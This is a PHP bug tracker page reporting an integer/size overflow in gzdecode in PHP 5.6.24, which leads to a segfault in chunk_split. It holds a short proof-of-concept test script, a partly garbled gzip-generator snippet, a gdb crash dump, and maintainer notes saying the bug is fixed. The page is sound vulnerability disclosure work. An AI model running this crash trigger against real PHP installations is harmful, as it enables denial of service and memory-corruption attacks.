|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #72881 gzdecode does NOT check output string size which leads to an overflow
Submitted: 2016-08-18 13:46 UTC Modified: 2017-02-13 01:30 UTC
From: nguyenluan dot vnn at gmail dot com Assigned: stas (profile)
Status: Closed Package: Zlib related
PHP Version: 5.6.24 OS:
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome! If you don't have a Git account, you can't do anything here.
You can add a comment by following this link or if you reported this bug, you can edit this bug over here.
Block user comment
Status: Assign to:
Bug Type:
From: nguyenluan dot vnn at gmail dot com
New email:
PHP Version: OS:


 [2016-08-18 13:46 UTC] nguyenluan dot vnn at gmail dot com
The gzdecode function does NOT check for the output string size so attacker could create a string larger than 2GB. This abnormal PHP string could be use as the input to another function as the attack vector.

Test script:
    ini_set('memory_limit', -1);

    $gzstr = file_get_contents("gz.txt.gz");
    $str = gzdecode($gzstr);

    chunk_split($str, 20, $str);

gz.txt.gz was created from this python script:

import gzip
with"gz.txt.gz", 'wb') as f:
	for i in range(32769):

Expected result:
No crash

Actual result:
Starting program: /home/user/Desktop/php-5.6.24/sapi/cli/php ../test_minhrau2.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/".

Program received signal SIGSEGV, Segmentation fault.
RAX: 0xfffffffffffdffa8 
RBX: 0x8afb0f (<execute_ex>:	push   rbp)
RCX: 0xffffffff00020000 
RDX: 0xffffffff80010000 
RSI: 0x7fff3d90c070 ('a' <repeats 200 times>...)
RDI: 0x7fffbd91c0c8 ('a' <repeats 16 times>)
RBP: 0x7fffffffa5d0 --> 0x7fffffffa640 --> 0x7fffffffa680 --> 0x7fffffffa6b0 --> 0x7fffffffa6e0 --> 0x7fffffffa840 --> 0x7fffffffcab0 --> 0x7fffffffddf0 --> 0x7fffffffdf50 --> 0x0 
RSP: 0x7fffffffa528 --> 0x7715fc (<zif_chunk_split+290>:	mov    eax,DWORD PTR [rbp-0x6c])
RIP: 0x7ffff675ceee (<__memcpy_sse2_unaligned+46>:	)
R8 : 0x0 
R9 : 0x0 
R10: 0x7fffffffa260 --> 0x0 
R11: 0x7ffff684b390 --> 0xfffda7a0fffda4cf 
R12: 0x4228a0 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffe030 --> 0x2 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
   0x7ffff675cee0 <__memcpy_sse2_unaligned+32>:	movdqu xmm8,XMMWORD PTR [rsi]
   0x7ffff675cee5 <__memcpy_sse2_unaligned+37>:	cmp    rdx,0x20
   0x7ffff675cee9 <__memcpy_sse2_unaligned+41>:	movdqu XMMWORD PTR [rdi],xmm8
=> 0x7ffff675ceee <__memcpy_sse2_unaligned+46>:	
    movdqu xmm8,XMMWORD PTR [rsi+rdx*1-0x10]
   0x7ffff675cef5 <__memcpy_sse2_unaligned+53>:	
    movdqu XMMWORD PTR [rdi+rdx*1-0x10],xmm8
   0x7ffff675cefc <__memcpy_sse2_unaligned+60>:	
    ja     0x7ffff675cf10 <__memcpy_sse2_unaligned+80>
   0x7ffff675cefe <__memcpy_sse2_unaligned+62>:	mov    rax,rdi
   0x7ffff675cf01 <__memcpy_sse2_unaligned+65>:	ret
0000| 0x7fffffffa528 --> 0x7715fc (<zif_chunk_split+290>:	mov    eax,DWORD PTR [rbp-0x6c])
0008| 0x7fffffffa530 --> 0x7fffffffa564 --> 0x2000080010000 
0016| 0x7fffffffa538 --> 0x83105c (<_efree+111>:	leave)
0024| 0x7fffffffa540 --> 0x0 
0032| 0x7fffffffa548 --> 0x7ffff7f7e1e8 --> 0x7ffff7fb8a78 ('Z' <repeats 16 times>, "\001")
0040| 0x7fffffffa550 --> 0x7ffff7fb8a78 ('Z' <repeats 16 times>, "\001")
0048| 0x7fffffffa558 --> 0x300000000 
0056| 0x7fffffffa560 --> 0x8001000000000000 
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__memcpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36
36	../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
gdb-peda$ bt
#0  __memcpy_sse2_unaligned ()
    at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36
#1  0x00000000007715fc in zif_chunk_split (ht=0x3, 
    return_value=0x7ffff7fb8a78, return_value_ptr=0x7ffff7f7e1e8, 
    this_ptr=0x0, return_value_used=0x0)
    at /home/user/Desktop/php-5.6.24/ext/standard/string.c:2221
#2  0x00000000008b0500 in zend_do_fcall_common_helper_SPEC (
    at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:558
#3  0x00000000008b5de6 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (
    at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:2602
#4  0x00000000008afb6f in execute_ex (execute_data=0x7ffff7f7e320)
    at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:363
#5  0x00000000008afbf8 in zend_execute (op_array=0x7ffff7fb7e78)
    at /home/user/Desktop/php-5.6.24/Zend/zend_vm_execute.h:388
#6  0x000000000086af69 in zend_execute_scripts (type=0x8, retval=0x0, 
    file_count=0x3) at /home/user/Desktop/php-5.6.24/Zend/zend.c:1341
#7  0x00000000007d0ab0 in php_execute_script (primary_file=0x7fffffffcbf0)
    at /home/user/Desktop/php-5.6.24/main/main.c:2613
#8  0x000000000091f33e in do_cli (argc=0x2, argv=0x106c3d0)
    at /home/user/Desktop/php-5.6.24/sapi/cli/php_cli.c:994
#9  0x000000000092066c in main (argc=0x2, argv=0x106c3d0)
    at /home/user/Desktop/php-5.6.24/sapi/cli/php_cli.c:1378
#10 0x00007ffff66e6f45 in __libc_start_main (main=0x91fe54 <main>, argc=0x2, 
    argv=0x7fffffffe038, init=<optimized out>, fini=<optimized out>, 
    rtld_fini=<optimized out>, stack_end=0x7fffffffe028) at libc-start.c:287
#11 0x00000000004228c9 in _start ()


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-02 06:23 UTC]
-Assigned To: +Assigned To: stas
 [2016-09-02 06:23 UTC]
The fix is in security repo as 0f1eb74e92191e817b4198ceda4e8f093699da62 and in
please verify
 [2016-09-02 16:07 UTC] nguyenluan dot vnn at gmail dot com
The patch is good.
 [2016-09-13 04:13 UTC]
-Status: Assigned +Status: Closed
 [2016-09-13 04:13 UTC]
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at

 For Windows:
Thank you for the report, and for helping us make PHP better.

 [2016-09-13 12:32 UTC] nguyenluan dot vnn at gmail dot com
Can you assign a CVE number for this?
 [2017-02-13 01:30 UTC]
-Type: Security +Type: Bug
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Jul 24 16:01:28 2024 UTC